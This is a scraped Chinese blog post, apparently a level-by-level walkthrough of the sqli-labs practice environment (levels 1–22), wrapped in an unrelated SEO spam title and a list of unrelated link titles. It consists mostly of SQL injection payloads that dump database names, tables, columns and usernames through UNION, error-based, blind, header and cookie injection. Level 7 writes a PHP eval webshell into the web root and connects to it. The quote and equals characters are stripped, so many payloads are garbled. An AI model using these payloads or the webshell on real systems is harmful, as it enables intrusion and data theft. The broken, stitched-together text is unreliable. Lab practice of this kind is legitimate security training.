当前位置: 首页 > news >正文

济南seo网站推广公司微信如何制作网页

济南seo网站推广公司,微信如何制作网页,wordpress 首页乱码,水果配送网站建设2024.1.21 level-1 #xff08;单引号装饰#xff09; 先根据提示建立一个get请求 在尝试使用单个单引号测试#xff0c;成功发现语句未闭合报错 然后反手一个 order by 得到数据库共3列#xff0c;-- 后面加字母防止浏览器吃掉 -- 操作#xff08;有些会#xff09…2024.1.21 level-1 单引号装饰  先根据提示建立一个get请求 在尝试使用单个单引号测试成功发现语句未闭合报错 然后反手一个 order by 得到数据库共3列-- 后面加字母防止浏览器吃掉 -- 操作有些会 再把id改到一个不存在的值防止占用回显位接上 select 得到回显位是2,3 然后随便选一个回显位开始 爆库 -- 爆表 -- 爆字段 -- 爆数据 ?id-1 union select 1,2,database() -- a ?id-1 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schemasecurity) -- a ?id-1 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schemadatabase() and table_nameusers) -- a ?id-1 union select 1,2,(select group_concat(~,username,~) from security.users limit 0,1) -- a 爆数据时也可以用 ?id-1 union select 1,2,(select concat(~,username,~) from security.users limit 0,1) -- a 或 ?id-1 union select 1,2,(select concat(~,username,~) from security.users where id1) -- a 来一个一个爆 level-1能有什么坏心思呢直接拿下(¬◡¬)✧ level-2 数字型  先尝试了一个和两个单双引号结果都报错那就在尝试 id2-1 发现返回的是id1的值那就很明显是个简单的数字型注入 然后就和level-1一样依葫芦画瓢 得列数 -- 爆库 -- 爆表 -- 爆字段 -- 爆数据 此处省略直接给最后一步 ?id-1 union select 1,2,(select group_concat(~,username,~) from security.users limit 0,1) -- a level-2能有什么坏心思呢不过是leve-1变了个性罢了(¬◡¬)✧ level-3 单引号括号装饰  按惯例先小a一个单引号很好报错了看一下报错信息发现多了壳那就很容易猜到数据库接收的格式大概是 username(%s) 这样的那我们也套个壳并把原有的壳干掉 尝试了一下果然没错那接下来就是老操作 得列数 -- 爆库 -- 爆表 -- 爆字段 -- 爆数据 直接给poc ?id-1) union select 1,2,(select group_concat(~,username,~) from security.users limit 0,1) -- a level-3能有什么坏心思呢不过是leve-1穿了个衣服罢了(¬◡¬)✧ level-4 双引号括号装饰  惯例上场先小a一个单引号没用再小a一个双引号直接破防猜出 username(%s)  那根据level-3的经验很容易造出绕过 构造出poc ?id-1) union select 1,2,(select group_concat(~,username,~) from security.users limit 0,1) -- a level-4能有什么坏心思呢不过是leve-3的兄弟罢了(¬◡¬)✧ level-5 报错注入  很好对面上来就放隐身技能but我们先小a一个单引号专治各种花里胡哨对面马上显现 观察报错信息可知和level-1一个路数但对面都放技能了我们再平a就不太厚道了那就趁他病要他命直接甩个报错注入 Ps:两个常用的报错函数详细用法请自行了解 函数示例updatexml()?id-1 and updatexml(1,concat(0x7e,database(),0x7e),1)  -- aextractvalue()extractvalue(1,concat(0x7e,(mid((select user()),1,32)),0x7e)) 老套路 爆库 -- 爆表 -- 爆字段 -- 爆数据 ?id1 union select extractvalue(1,concat(~,database(),~)) -- a ?id1 and extractvalue(1,concat(~,(select group_concat(table_name) from information_schema.tables where table_schemadatabase()),~)) -- a ?id1 and extractvalue(1,concat(~,(select group_concat(column_name) from information_schema.columns where table_schemadatabase() and table_nameusers),~)) -- a ?id1 and extractvalue(1,concat(~,(select group_concat(username) from security.users limit 0,1),~)) -- a Ps:因为报错注入最多显示32位所以最后面的 ~ 没了这也是 ~ 存在的原因可以判断字段是否显示完整 level-5能有什么坏心思呢不过是leve-1想和你玩躲猫猫罢了(¬◡¬)✧ level-6 报错注入  很好又来小a一个单引号没用那就小a一个双引号直接秒了 直接给出poc ?id1 and extractvalue(1,concat(~,(select group_concat(username) from security.users limit 0,1),~)) -- a level-6能有什么坏心思呢不过是leve-1的兄弟想和你玩躲猫猫罢了(¬◡¬)✧ level-7 转储到输出文件  又开始玩花招了报错信息被ban了但他还留了提示 use outfile  但依然还是先判断绕过的格式经过一番激烈的斗争......,得到了格式为 )) 要想mysql读写文件需要更改mysql配置 找到mysql里的my.ini在[mysqld]中加入 secure-file-priv 保存并重启mysql即可 那既然 outfile 都甩脸上了直接写一个一句话木马再用蚁剑一连哎小样给你底裤都扒干净咯 ?id-1)) union select 1,2,?php eval($_POST[abc]);? into outfile D:\\2.tools_app\\phpstudy\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php -- a level-7能有什么坏心思呢不过是leve-1不想被你看光光罢了(¬◡¬)✧ level-8 盲注  level-7 异父异母的亲兄弟小a个单引号很容易判断出注入点 id1 -- a 但很显然 level-8 吸收了level-7 的缺陷一句话木马注不进去那么我们也要改变战术——盲注走起那么—— 先爆破一下库名的长度长度为8 ?id1 and length(database())1 -- a 在对库名进行爆破,整理得 security ?id1 and mid((select database()),1,1)a -- a 爆表名得emails,referers,uagents,users ?id1 and mid((select group_concat(table_name) from information_schema.tables where table_schemadatabase()),1,1)a -- a 爆字段和爆数据操作类似不写了偷个懒 level-8能有什么坏心思呢不过是leve-1欲情故纵罢了(¬◡¬)✧ level-9 盲注  很好开始装高冷了输什么都是一个样那么就来看看你内心是否真的波澜不惊 抓包扔到 repeater 中可以看到 Content-Length: 707 代表正确 然后小a一个单引号马上显形 那么后续操作就和level-8一样了 ?id1 and mid((select database()),1,1)a -- a level-9能有什么坏心思呢不过是leve-1表面的风平浪静罢了(¬◡¬)✧ level-10 盲注  level-9的孪生兄弟双引号秒了 ?id1 and mid((select database()),1,1)a -- a level-10能有什么坏心思呢不过是想给leve-1报仇罢了(¬◡¬)✧ level-11 单引号装饰 变成表单了但任他变化万千单引号yyds 在反手接一个万能密码直接拿下 uname1or 11 -- apasswd2submitSubmit 这一题把GET请求变成了POST请求但套路还是一样的 level-11能有什么坏心思呢不过是leve-1画了个妆罢了(¬◡¬)✧ level-12 双引号括号装饰 这熟悉的感觉是level-4没错了 uname1) or 11 -- apasswd2submitSubmit level-12能有什么坏心思呢不过是leve-4画了个妆罢了(¬◡¬)✧  level-13  报错注入  level-3的注入格式 uname1) -- apasswd2submitSubmit 但是只有登录成功的标志我的数据呐┻━┻︵╰(‵□′)╯︵┻━┻这显然不是我们想要的想必level-5已经告诉了我们答案你说是吧报错注入 uname1) and updatexml(1,concat(~,(select database()),~),1) -- apasswd2submitSubmit level-13能有什么坏心思呢不过是画了妆的leve-3陪你玩躲猫猫罢了(¬◡¬)✧  level-14 报错注入  一个双引号的事没啥好说的 uname1 and updatexml(1,concat(~,(select database()),~),1) -- apasswd2submitSubmit level-14能有什么坏心思呢我甚至不好评价(¬◡¬)✧  level-15 盲注  配合万能钥匙可以判断出是单引号包装 uname1 or 11 -- apasswd2submitSubmit 正确错误都没回显位 这高冷的气息想必盲注的心已经按耐不住了 uname1 or mid((select database()),1,1)a -- apasswd2submitSubmit level-15能有什么坏心思呢他只是想尝尝盲注的味道罢了(¬◡¬)✧  level-16 盲注 依旧是先判断注入点有了前几关的练级三下五除二的试出格式 uname1) or 11 -- a passwdsubmitSubmit 然后就是熟悉的味道熟悉的盲注 uname1) or mid((select database()),1,1)s -- a passwdsubmitSubmit level-16能有什么坏心思呢他只是level-4的兄弟罢了(¬◡¬)✧ level-17  报错注入  好好好这个小卡拉蜜开始嘴臭了这能忍忍不了一点ε怒ε怒ε怒ε怒ε( oω′)ノ 看 [PASSWORD RESET] 知道是重置密码那就要猜一下用户名了用burp自带的字典爆了一下可以爆出这些用户名 unameadminpasswd1submitSubmit 接下来就是要爆数据了我先尝试了一下对uname注入但是失败了那么在试一下对passwd注入本来想着用盲注的可在造轮子的时候有了意外发现测了一下当password的长度21时会有警告 unameadminpasswd123456789012345678901submitSubmit 那么有没有利用之处呢  报错注入一手直接拿下 unameadminpasswd1and updatexml(1,concat(~,(select database()),~),1) -- asubmitSubmit 事后回顾: 看了一下源代码之所以username没有注入点是因为用了mysql_fetch_array() mysql_fetch_array() 函数从结果集中取得一行做为关联数组(即键值对数组带有指定的键的数组每一个键关联一个值或数字数组带有数字 ID 键的数组或两者兼有mysql 返回根据从结果集取得的行生成的数组若是没有更多行则返回 false。 level-17能有什么坏心思呢只是犯下了傲慢之罪罢了(¬◡¬)✧ level-18 User-Agent 注入 一开始就把IP怼脸上既然有IP显示那大概率http请求报头与数据库有交互既然有交互就有注入的机会在用admin登录看看有什么幺蛾子 unameadminpasswdadminsubmitSubmit 可以看到 User-Agent 也有交互那么针对 User-Agent 构造poc直接接在后面即可 and updatexml(1,concat(~,(select database()),~),1) and Ps:                         and        updatexml(1,concat(~,(select database()),~),1)        and                         ↓         ↓                                               ↓                                                ↓          ↓            与数据  连接                                    报错注入语句                                  连接   与数据            库原有  前后                                                                                            前后   库原有            的单引  语句                                                                                            语句   的单引            号闭合                                                                                                               号闭合 level-18能有什么坏心思呢只是想更多的了解你罢了(¬◡¬)✧ level-19 Referer 注入  和 level-18 殊途同归这题是 Referer 请求头注入改都不带改的直接一粘 and updatexml(1,concat(~,(select database()),~),1) and level-19能有什么坏心思呢不过想看看召唤自己的咒语罢了(¬◡¬)✧ level-20 cookie 注入 用admin登进去发现这次多了 cookie 属性那就抓包准备接借 cookie 之手进行注入 哎呀也没啥变化和level-19一样一粘可以了 and updatexml(1,concat(~,(select database()),~),1) and level-20能有什么坏心思呢他只是罢了(¬◡¬)✧唯有抓包才能发现的彩蛋也许吧 level-21 (cookie 注入数据加密)  从页面上就可以看出这次的数据被 baes64 加密了 中国有句古话师夷长技以制夷 用base64加密后的数据即可爆出数据 加密前 admin and updatexml(1,concat(~,(select database()),~),1) and 加密后  YWRtaW4nIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoJ34nLChzZWxlY3QgZGF0YWJhc2UoKSksJ34nKSwxKSBhbmQgJw level-21能有什么坏心思呢他只是进行了秘密行动罢了(¬◡¬)✧ level-22 (cookie 注入数据加密)   和level-21大差不差用双引号装饰 admin and updatexml(1,concat(~,(select database()),~),1) and YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoJ34nLChzZWxlY3QgZGF0YWJhc2UoKSksJ34nKSwxKSBhbmQgIg level-22能有什么坏心思呢(¬◡¬)✧
http://www.zqtcl.cn/news/521744/

相关文章:

  • 用php做视频网站有哪些十大免费logo设计
  • 网站建设对于网络营销的意义微信购物商城
  • 基于个性化推荐的电商网站设计与实现网站 用户体验的重要性
  • 怎么用ajax做电商网站企业网查询是什么
  • 海淀企业网站建设张店学校网站建设公司
  • 专业微网站开发做购物网站怎么赚钱
  • 怎样做酒店网站ppt什么是企业网络营销平台
  • 科技部网站改版方案济南众筹网站建设
  • 中国城乡与住房建设部网站电子商务公司名字推荐
  • 设计参考网站有哪些wordpress 支付宝免签
  • 网站关键词排名优化应该怎么做外包加工网缝纫机外放加工活
  • 电影网站建设模板从传播的角度
  • 北京建网站的公司广州冼村和猎德村哪个最有钱
  • 成都网站建设有限公司济南j建设网
  • 一家网站建设公司需要什么资质互联网网站模块
  • 网站开发php支付接口网站平台建设缴纳什么税
  • 百度文库推广网站庆云网站seo
  • 全网通网站wordpress 按点击调用热门文章
  • 添加网站栏目的步骤网站需求分析怎么做
  • 做网站用那一种语言最好武邑网站建设价格
  • 哈尔滨网站制作招聘互动的网站
  • 专业网站建设品牌网站建设基础课件
  • 自学网站编程网站建设银行北京冬奥会纪念币发行时间
  • 个人网站备案需要盖章吗做网站用什么颜色好
  • 在线制作论坛网站做网站开发团队
  • 2017年网站建设工作总结dhru商城网站建设
  • 建设网站需要申请深圳的网站建设的公司
  • 教育类的网站案例门户网站建设推广
  • 网站建设公司哪家比较好外贸网站建设公司价格
  • 做网站大概价格网站备案填写